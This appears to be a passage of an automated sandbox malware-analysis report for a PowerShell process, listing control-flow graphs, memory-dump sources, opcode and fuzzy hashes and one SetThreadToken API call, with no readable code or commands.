                                        control_flow_graph 501 4c7af97-4c7afa2 502 4c7afa4-4c7afa6 501->502 503 4c7afab-4c7afb1 501->503 502->503 504 4c7afb3-4c7afc2 503->504 505 4c7b02f-4c7b031 503->505 512 4c7afc4-4c7afc6 504->512 513 4c7afcb-4c7afd6 504->513 508 4c7b033-4c7b049 505->508 510 4c7b04e-4c7b389 call 4c7a2f4 508->510 511 4c7b04b 508->511 582 4c7b38e-4c7b395 510->582 511->510 512->513 516 4c7afd9-4c7afe0 513->516 516->516 518 4c7afe2-4c7b02a 516->518 518->508 527 4c7b02c 518->527 527->505
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CYm^$SYm^$cYm^$sYm^$Ym^
                                        • API String ID: 0-1379649019
                                        • Opcode ID: 0fe950a1a816dadfc06518f73a793d2f276affe523d5d8ad3d3007a0cb662137
                                        • Instruction ID: 747ba45fb919ad8f7fd85c4b620ec3dd6f4aa51cd38eeac6e63963763d9d53bb
                                        • Opcode Fuzzy Hash: 0fe950a1a816dadfc06518f73a793d2f276affe523d5d8ad3d3007a0cb662137
                                        • Instruction Fuzzy Hash: 8BB1E5B1A007545FDB1AEFB488145AEBBB3DF85708B00852ED149AF340DF75AD0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 583 4c7b020-4c7b022 584 4c7b024-4c7b028 583->584 585 4c7b02b-4c7b049 583->585 584->585 587 4c7b04e-4c7b389 call 4c7a2f4 585->587 588 4c7b04b 585->588 649 4c7b38e-4c7b395 587->649 588->587
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CYm^$SYm^$cYm^$sYm^$Ym^
                                        • API String ID: 0-1379649019
                                        • Opcode ID: 1b157330b578405d43b3d6c245666edf7633dd4f656c0ffaac3de7c3490c18d1
                                        • Instruction ID: c0b67323bec9183198d514dc21742b6ca712ae9105161983639fa2d71f40df6b
                                        • Opcode Fuzzy Hash: 1b157330b578405d43b3d6c245666edf7633dd4f656c0ffaac3de7c3490c18d1
                                        • Instruction Fuzzy Hash: 299152B5B007155FDB1AEFB4C5145AEBAA3EF84704B00892DD14AAB340DF75AD0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 650 4c7b030-4c7b049 652 4c7b04e-4c7b389 call 4c7a2f4 650->652 653 4c7b04b 650->653 714 4c7b38e-4c7b395 652->714 653->652
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CYm^$SYm^$cYm^$sYm^$Ym^
                                        • API String ID: 0-1379649019
                                        • Opcode ID: 05093c6d29b4479d45479327ca34e84c9060eeadf0fa097c68557cb17023b0d7
                                        • Instruction ID: 9be27d451e6c9ef333f37355a4205b8337321e1805810c895e106090502a7002
                                        • Opcode Fuzzy Hash: 05093c6d29b4479d45479327ca34e84c9060eeadf0fa097c68557cb17023b0d7
                                        • Instruction Fuzzy Hash: A29153B5B006155FDB1AEFB4C5145AEBAE3EF84704B00892DD14AAB340DF75AD0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$xl$xl
                                        • API String ID: 0-1567293520
                                        • Opcode ID: 9cbd1180927598bd3ba0e01ebfb8a2d65caf628af3cb7ee7c69b615c585cfae9
                                        • Instruction ID: 36c7d3147c92d5d8ccc822b906477d6089ca71dcf65a2c70c48cfb2ada656bcc
                                        • Opcode Fuzzy Hash: 9cbd1180927598bd3ba0e01ebfb8a2d65caf628af3cb7ee7c69b615c585cfae9
                                        • Instruction Fuzzy Hash: 7CA259B1B1420ADFCB258B68C90576ABBB6BFC6318F1484BAD505CF351DB32D885C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 715 4c7ded0-4c7df11 718 4c7df13 715->718 719 4c7df18-4c7e050 call 4c7de60 715->719 718->719 739 4c7e072-4c7e084 719->739 740 4c7e052-4c7e06a call 4c7de60 719->740 742 4c7e086-4c7e098 739->742 743 4c7e09a-4c7e0b5 739->743 740->739 742->743 745 4c7e0c3-4c7e0c5 742->745 743->745 748 4c7e0b7-4c7e0c1 743->748 746 4c7e0cd-4c7e0df 745->746 749 4c7e0f5-4c7e110 746->749 750 4c7e0e1-4c7e0f3 746->750 748->746 751 4c7e121-4c7e123 749->751 755 4c7e112-4c7e11f 749->755 750->749 750->751 754 4c7e12e-4c7e140 751->754 756 4c7e156-4c7e171 754->756 757 4c7e142-4c7e154 754->757 755->754 758 4c7e182-4c7e184 756->758 762 4c7e173-4c7e180 756->762 757->756 757->758 760 4c7e18f-4c7e1a3 758->760 763 4c7e1a5 760->763 764 4c7e1d9-4c7e1db 760->764 762->760 763->764 765 4c7e203-4c7e20d 763->765 766 4c7e20f-4c7e211 763->766 767 4c7e1ac-4c7e1b8 763->767 768 4c7e1ba-4c7e1c6 763->768 769 4c7e1c8-4c7e1d7 763->769 770 4c7e1e6-4c7e1fa 764->770 772 4c7e21c-4c7e22f 765->772 766->772 767->770 768->770 769->770 770->766 776 4c7e1fc 770->776 780 4c7e253-4c7e266 772->780 781 4c7e231-4c7e24b 772->781 776->765 776->766 784 4c7e26f-4c7e271 780->784 785 4c7e268-4c7e26d 780->785 781->780 786 4c7e278-4c7e27a 784->786 785->786 787 4c7e2a5-4c7e2ea 786->787 788 4c7e27c-4c7e29d 786->788 792 4c7e313-4c7e327 787->792 793 4c7e2ec-4c7e30b 787->793 798 4c7e29f call 4c7f5f0 788->798 799 4c7e29f call 4c7f640 788->799 795 4c7e343-4c7e34c 792->795 796 4c7e329-4c7e33b 792->796 793->792 796->795 798->787 799->787
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c/m^$s/m^
                                        • API String ID: 0-2366638527
                                        • Opcode ID: 756ca445734ca90d8802ba1ff8202acef3140f205bb1bfb91b85ec153416db19
                                        • Instruction ID: c2c01aa0614ee44a13d9849865a0905a2674529b24b13009b039c4de0ceabf8a
                                        • Opcode Fuzzy Hash: 756ca445734ca90d8802ba1ff8202acef3140f205bb1bfb91b85ec153416db19
                                        • Instruction Fuzzy Hash: D1E1F9397002048FDB05DF68C588AA9BBF2FF49315F4984A9E40AAB362DB35ED45CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 800 4c7dec0-4c7dec2 801 4c7dec4-4c7dec8 800->801 802 4c7decb-4c7df11 800->802 801->802 806 4c7df13 802->806 807 4c7df18-4c7e050 call 4c7de60 802->807 806->807 827 4c7e072-4c7e084 807->827 828 4c7e052-4c7e06a call 4c7de60 807->828 830 4c7e086-4c7e098 827->830 831 4c7e09a-4c7e0b5 827->831 828->827 830->831 833 4c7e0c3-4c7e0c5 830->833 831->833 836 4c7e0b7-4c7e0c1 831->836 834 4c7e0cd-4c7e0df 833->834 837 4c7e0f5-4c7e110 834->837 838 4c7e0e1-4c7e0f3 834->838 836->834 839 4c7e121-4c7e123 837->839 843 4c7e112-4c7e11f 837->843 838->837 838->839 842 4c7e12e-4c7e140 839->842 844 4c7e156-4c7e171 842->844 845 4c7e142-4c7e154 842->845 843->842 846 4c7e182-4c7e184 844->846 850 4c7e173-4c7e180 844->850 845->844 845->846 848 4c7e18f-4c7e1a3 846->848 851 4c7e1a5 848->851 852 4c7e1d9-4c7e1db 848->852 850->848 851->852 853 4c7e203-4c7e20d 851->853 854 4c7e20f-4c7e211 851->854 855 4c7e1ac-4c7e1b8 851->855 856 4c7e1ba-4c7e1c6 851->856 857 4c7e1c8-4c7e1d7 851->857 858 4c7e1e6-4c7e1fa 852->858 860 4c7e21c-4c7e22f 853->860 854->860 855->858 856->858 857->858 858->854 864 4c7e1fc 858->864 868 4c7e253-4c7e266 860->868 869 4c7e231-4c7e24b 860->869 864->853 864->854 872 4c7e26f-4c7e271 868->872 873 4c7e268-4c7e26d 868->873 869->868 874 4c7e278-4c7e27a 872->874 873->874 875 4c7e2a5-4c7e2ea 874->875 876 4c7e27c-4c7e29d 874->876 880 4c7e313-4c7e327 875->880 881 4c7e2ec-4c7e30b 875->881 886 4c7e29f call 4c7f5f0 876->886 887 4c7e29f call 4c7f640 876->887 883 4c7e343-4c7e34c 880->883 884 4c7e329-4c7e33b 880->884 881->880 884->883 886->875 887->875
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c/m^$s/m^
                                        • API String ID: 0-2366638527
                                        • Opcode ID: 9864de32418e36a2dea94dab131b07fb7463d87d1149dca2ab584f19e6ca54cf
                                        • Instruction ID: f6c84ccc860ff6ea64493dbefb215fc21c630a085679b77f3d8c8b492254b644
                                        • Opcode Fuzzy Hash: 9864de32418e36a2dea94dab131b07fb7463d87d1149dca2ab584f19e6ca54cf
                                        • Instruction Fuzzy Hash: D8E1E7397002048FDB05DF68C588AA9BBF2FF49315F4984A9E40AAB362DB35ED45CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 888 87e35f0-87e3633 890 87e363b-87e3667 SetThreadToken 888->890 891 87e3669-87e366f 890->891 892 87e3670-87e368d 890->892 891->892
                                        APIs
                                        • SetThreadToken.KERNELBASE(?), ref: 087E365A
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2082348655.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: 0f8d4210d657302235e17099d92702f7cdb31ddbc6a7b211a069a7278bdc0bbf
                                        • Instruction ID: 810d342de700c254d46b71a4e46464e1259731c4dc25790a00a268f7e8799556
                                        • Opcode Fuzzy Hash: 0f8d4210d657302235e17099d92702f7cdb31ddbc6a7b211a069a7278bdc0bbf
                                        • Instruction Fuzzy Hash: 561126B19002488FDB10DFA9C545BDEFFF4AB49324F24886AD058A7350C775A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph: function at 87e35f8, calls SetThreadToken (graph rendering not reproduced)
                                        APIs
                                        • SetThreadToken.KERNELBASE(?), ref: 087E365A
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2082348655.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: d851602f5919308b68e0533930c189cc72f5f5c7e0bebbfc98cba30c275cc5cb
                                        • Instruction ID: 4e6812ad851e8c1c5655ccc5c3203ade620127a95ad55f103bf585a9ed53bb00
                                        • Opcode Fuzzy Hash: d851602f5919308b68e0533930c189cc72f5f5c7e0bebbfc98cba30c275cc5cb
                                        • Instruction Fuzzy Hash: D71106B59002098FCB10DFAAD544BDEFBF8EF49324F14846AD458A7350D774A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph: function at 4c7bba8, calls 4c77678 (graph rendering not reproduced)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: 2c288289e574e01290f21a967de8b6688ee64f7114c1aa23ce79deafe350b84c
                                        • Instruction ID: 40e2727b8146a887160148910c56e99307f9278e87e75cb5d11ee462ad2e4531
                                        • Opcode Fuzzy Hash: 2c288289e574e01290f21a967de8b6688ee64f7114c1aa23ce79deafe350b84c
                                        • Instruction Fuzzy Hash: BE31E2753042009FD715EB79E89096EBB97EFC43A4710853ED60ACB254DE31EC4687A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph: function at 4c7a8c9, calls 4c7aa00 / 4c7aa10 and 4c78a94 (graph rendering not reproduced)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: em^
                                        • API String ID: 0-2080301082
                                        • Opcode ID: b368c3d9e832ce990cf9d28648079acc01756c82fe0cc21ab1faf55731c5958f
                                        • Instruction ID: c3099102f9bd0859d38ca814bfe92b41e366c4416e67f0798969ae6c0942b49d
                                        • Opcode Fuzzy Hash: b368c3d9e832ce990cf9d28648079acc01756c82fe0cc21ab1faf55731c5958f
                                        • Instruction Fuzzy Hash: F731B478E006059FDB04EFA4D855ABEBBB3EF88300F118479D204AB395DA39ED468F51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph: function at 4c7bab1, calls 4c7bb97 / 4c7bba8 (graph rendering not reproduced)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: </wl
                                        • API String ID: 0-2362596250
                                        • Opcode ID: af4d4a29c9c876ce5c3b8032aeee5cc960c7950b4e9013b032be42be4694a66e
                                        • Instruction ID: fb46c46170430b9ebcf7351f79aae6506dda5bd3132f6f9f17fbe04be2091885
                                        • Opcode Fuzzy Hash: af4d4a29c9c876ce5c3b8032aeee5cc960c7950b4e9013b032be42be4694a66e
                                        • Instruction Fuzzy Hash: 1A31CE357003018FCB11CF69C980AAAFBF6AF88314F04846AE559DB365E771FE498B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph: function at 4c7ab38, calls 4c7a07c (graph rendering not reproduced)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q
                                        • API String ID: 0-2067289071
                                        • Opcode ID: f5776fc7eeff167ac1d9bb5f3f8c7078b0e3fa6aa430208129754614a5b5a928
                                        • Instruction ID: 2f28cc1bef1100dfda96ee060aa850a59af4f21b17acf86060cfede69a99eb44
                                        • Opcode Fuzzy Hash: f5776fc7eeff167ac1d9bb5f3f8c7078b0e3fa6aa430208129754614a5b5a928
                                        • Instruction Fuzzy Hash: BA21D171A042588FCB14DFAED404B9EBFF6EB88360F24846ED108E7340CB75A945CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph: function at 4c7a8d8, calls 4c7aa00 / 4c7aa10 and 4c78a94 (graph rendering not reproduced)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: em^
                                        • API String ID: 0-2080301082
                                        • Opcode ID: 24c75be6203ac7add783745edcfe1d8ecb4c68b50d54c56917f9c068fda6340a
                                        • Instruction ID: 146dbb8f0e23ddbe22250fafae75e50cec2e75db5b068504fa2adf0db5e1c922
                                        • Opcode Fuzzy Hash: 24c75be6203ac7add783745edcfe1d8ecb4c68b50d54c56917f9c068fda6340a
                                        • Instruction Fuzzy Hash: D4315078E006099FDB04EFA4D854ABEB7B3EF84304F118478D215AB395DA79DD458F90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91a4f406c97246a3eb609dc3a4d8880a361b836ea98e0625fe1bc30511c3e888
                                        • Instruction ID: 5ba529bc4f187d261719633651d5e35b5b6a499242be319a645114d30d8d08a1
                                        • Opcode Fuzzy Hash: 91a4f406c97246a3eb609dc3a4d8880a361b836ea98e0625fe1bc30511c3e888
                                        • Instruction Fuzzy Hash: 4E919D34B002198FCB14CF79C59496EBBE7AF88714B14846EE805EB364EB75ED42CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 688bf434aad868347e960be84e20ac4ad7d477eed3bcc9c50c06c0701c5f03e3
                                        • Instruction ID: 98906809e321daa0b472ef62ec6cd27bea11e1c9833baccb92bd753be7ec5822
                                        • Opcode Fuzzy Hash: 688bf434aad868347e960be84e20ac4ad7d477eed3bcc9c50c06c0701c5f03e3
                                        • Instruction Fuzzy Hash: 28A1AD70A002458FCB16CF59C4949AEFBB2FF89310B2485AAD8559B3A5C735FC41CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ea049585acd0c953a295b1f482294431cf0da2b2a33f2f7630c35b419a0023c
                                        • Instruction ID: b2d0686f5002f3194b67ee83abcbef1227d9568cc28b2d3274053486f693727b
                                        • Opcode Fuzzy Hash: 5ea049585acd0c953a295b1f482294431cf0da2b2a33f2f7630c35b419a0023c
                                        • Instruction Fuzzy Hash: 93611875E002489FCB14DFA9D584A9DFBF2EF88314F188069E818EB354EB74AD45CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5da9dc567e65b53016c055c3576c39a2a4bd9fba6f5bba4cab4ecd2de4a9dc8e
                                        • Instruction ID: cc195f8618352441ae22165a1d1aefcd3154ee46df376e9aef2c6d7290deff36
                                        • Opcode Fuzzy Hash: 5da9dc567e65b53016c055c3576c39a2a4bd9fba6f5bba4cab4ecd2de4a9dc8e
                                        • Instruction Fuzzy Hash: 52610875E002489FCB14DFA9C584A9DFBF2FF88314F198169E809AB354EB74AD45CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50c9d5f2c9b43adc8df4c63c8a0ea3cd2e7c920161829aeac475de16d56ff093
                                        • Instruction ID: 7a080eb62d8173ce47cbbc16acb762ef3cc0446d975ff61536e49af34d1f4c15
                                        • Opcode Fuzzy Hash: 50c9d5f2c9b43adc8df4c63c8a0ea3cd2e7c920161829aeac475de16d56ff093
                                        • Instruction Fuzzy Hash: 07419D35301219DFD744DB69D854A7A77EBFF88214F15846AE50ACB751EB31FC028B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: defd7e8795612bee84e54ce15789faf7c9ee4113a9a76ef83805a62e1f4dd293
                                        • Instruction ID: ee04350567123db46a72b025ef34a18af43aaddb9362b70841b08997cbc30739
                                        • Opcode Fuzzy Hash: defd7e8795612bee84e54ce15789faf7c9ee4113a9a76ef83805a62e1f4dd293
                                        • Instruction Fuzzy Hash: 24319E70A002099BDB08DF79D5946AEBFF7AF89364F148039E401EB750EA369C418F91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02aaaefc5bbd86418c08ae5f6f4cc951035acda99655c29ec95c7db290635937
                                        • Instruction ID: 995f3c2d774a68cc79aaa0b605e5e67acaf96678399b0c14f8a91e401e46fc48
                                        • Opcode Fuzzy Hash: 02aaaefc5bbd86418c08ae5f6f4cc951035acda99655c29ec95c7db290635937
                                        • Instruction Fuzzy Hash: 5C31F934A01209CFCB14DFA5C558AA9BBF2AB8D715F2450A8E506AB395DB35ED01CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fca31dc7c64136dd9066c7485dcee3400de2f7ad05ea8e2e233e66148b3e07a4
                                        • Instruction ID: 127fee79630bfe82c731c7ec0ee88d3e51817b91bc3cb3cd431fd339ec974139
                                        • Opcode Fuzzy Hash: fca31dc7c64136dd9066c7485dcee3400de2f7ad05ea8e2e233e66148b3e07a4
                                        • Instruction Fuzzy Hash: 282194393001058FD714DF7DD894A3A77D7EBC82657194079EA49CB355DE35EC068790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e082e9a9f41179a025b5fe9cc45ff0eee7f12d2b68f38b642359a85ab1209c6
                                        • Instruction ID: 3c44cfcac5b75fb9f9bf3a6afc804951b5cdd106f8db1d39588679aae86d7805
                                        • Opcode Fuzzy Hash: 4e082e9a9f41179a025b5fe9cc45ff0eee7f12d2b68f38b642359a85ab1209c6
                                        • Instruction Fuzzy Hash: C931F834B01209CFCB14DFA5C558AA9BBF2AF8D715F2440A8E516AB3A5DB35ED01CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6e726f7aab24e065cdc7f4b4dab6236bae144a3682235b7d3450d10fcb94ef6
                                        • Instruction ID: e1cdf3307ffe76d3a1f96f35a1f81daa1e986bcd21e762c31a798e82e108c88c
                                        • Opcode Fuzzy Hash: b6e726f7aab24e065cdc7f4b4dab6236bae144a3682235b7d3450d10fcb94ef6
                                        • Instruction Fuzzy Hash: 6421D631E082849FDB05CB69D4547EDBFB3AF89314F0C80BAC457AB292DB716A45CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc7344fdacccfa2fab2fb35c50739f447b7fe76dc72fd2989ed124eb1860dd4b
                                        • Instruction ID: 0e729b27b0876fa7489bcd8024be12d7132acd474e3d52ab346e168e95177387
                                        • Opcode Fuzzy Hash: cc7344fdacccfa2fab2fb35c50739f447b7fe76dc72fd2989ed124eb1860dd4b
                                        • Instruction Fuzzy Hash: 8C314870A002099FDB08DFA9C5957AEBBF7AF88350F148039E401EB360EA759C418F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc86f08b4afa26aa4b64d32d945263a7e7d3da5307ce022788bf19a059725f71
                                        • Instruction ID: 028e9f2a8fb29cdf0e7ee36628da18706ecb9483ff677b78ba25c426832c281f
                                        • Opcode Fuzzy Hash: cc86f08b4afa26aa4b64d32d945263a7e7d3da5307ce022788bf19a059725f71
                                        • Instruction Fuzzy Hash: 953189B09157449FEB60CF6ED0897DAFBE6EB88320F28C02EC8589B215C7746481CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2021779685.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e2e6f303f5dadc4e259876832eae997470c4bffa4582ce1880e18f32806339f1
                                        • Instruction ID: 502c4d2f5dca262d51b96aa4b5eee9bc48aeb5f0e5feedf9c6373deb48bb4736
                                        • Opcode Fuzzy Hash: e2e6f303f5dadc4e259876832eae997470c4bffa4582ce1880e18f32806339f1
                                        • Instruction Fuzzy Hash: 1A21F475514280EFCF05DF14DAC0B1AFFA5FB88314F24C5B9EA094A256C376D496CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e91714a35fbe92964304c44db120266fc12a60561182ca8b7ea6027937751893
